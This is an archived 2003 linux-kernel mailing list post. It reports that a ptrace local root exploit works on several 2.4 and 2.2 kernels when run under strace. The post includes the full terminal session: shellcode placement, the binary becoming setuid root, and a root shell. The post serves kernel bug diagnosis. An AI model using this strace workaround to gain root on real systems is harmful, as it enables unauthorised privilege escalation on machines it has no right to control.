On Wed, 19 Mar 2003, BODA Karoly jr. wrote:
> Well for me it didn't work on those kernels (all was i386 "of
> course"):
> 2.4.19-pre6aa1
> 2.4.21-pre4aa1
> 2.4.21-pre4aa3
> 2.2.16pre7
I must fix this. On those kernels WORKS the exploit. :( I've tried
lots of times (>100) to run simply the exploit didn't work. But when I
wanted to trace what the difference is it was working. :( I didn't try
the other versions I think it will work too... strace of course is not
setuid root. Here it goes:
woockie@death:~/tmp$ ls -l ptrace
-rwxr-xr-x 1 woockie woockie 9031 Mar 19 14:59 ptrace
woockie@death:~/tmp$ strace -o /dev/null -f -F ./ptrace
Process 4003 attached
[+] Attached to 4004
[+] Signal caught
[+] Shellcode placed at 0x4000da2d
umovestr: Input/output error
[+] Now wait for suid shell...
Process 4005 attached
Process 4002 suspended
Process 4003 detached
PTRACE_ATTACH: Operation not permitted
Too late?
PTRACE_ATTACH: Operation not permitted
Too late?
[1]+ Stopped strace -o /dev/null -f -F ./ptrace
woockie@death:~/tmp$ killall strace
woockie@death:~/tmp$ ls -l ptrace
-rwsr-sr-x 1 root root 9031 Mar 19 14:59 ptrace
woockie@death:~/tmp$ ./ptrace
root@death:~/tmp#
-- Woockie ..."what is there in this world that makes living worthwhile?" Death thought about it. "CATS," he said eventually, "CATS ARE NICE." (Terry Pratchett, Sourcery)P.S.: sorry for the previous mail :( Can anyone explain me why this works only this way?
- To unsubscribe from this list: send the line "unsubscribe linux-kernel" in the body of a message to majordomo@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html Please read the FAQ at http://www.tux.org/lkml/
This archive was generated by hypermail 2b29 : Sun Mar 23 2003 - 22:00:27 EST